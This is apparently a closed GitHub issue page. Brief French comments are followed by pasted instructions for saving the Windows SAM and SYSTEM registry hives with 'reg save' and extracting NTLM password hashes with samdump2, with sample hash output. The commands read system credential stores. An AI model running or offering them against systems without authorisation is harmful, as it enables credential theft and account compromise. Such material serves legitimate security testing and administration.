balllou
commented
4 years ago l'issue existe déja -> collecte infos, je déplace dans l'issue et je clôture
Closed Nidavelis closed 4 years ago
balllou
commented
4 years ago l'issue existe déja -> collecte infos, je déplace dans l'issue et je clôture
récupérer login/hash
There is a simpler solution which doesn't need to manage shadow volumes or use external tools. You can simply copy SAM and SYSTEM with the reg command provided by microsoft (tested on Windows 7 and Windows Server 2008):
reg save hklm\sam c:\sam reg save hklm\system c:\system
(the last parameter is the location where you want to copy the file)
You can then extract the hashes on a Linux system with package samdump2 (available on Debian: apt-get install samdump2):
$ samdump2 system sam Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0e2874fb130015aec4070975e2c6071::: disabled Guest:501:aad3b435b51404eeaad3b435b51404ee:d0c0896b73e0d1316aeccf93159d7ec0:::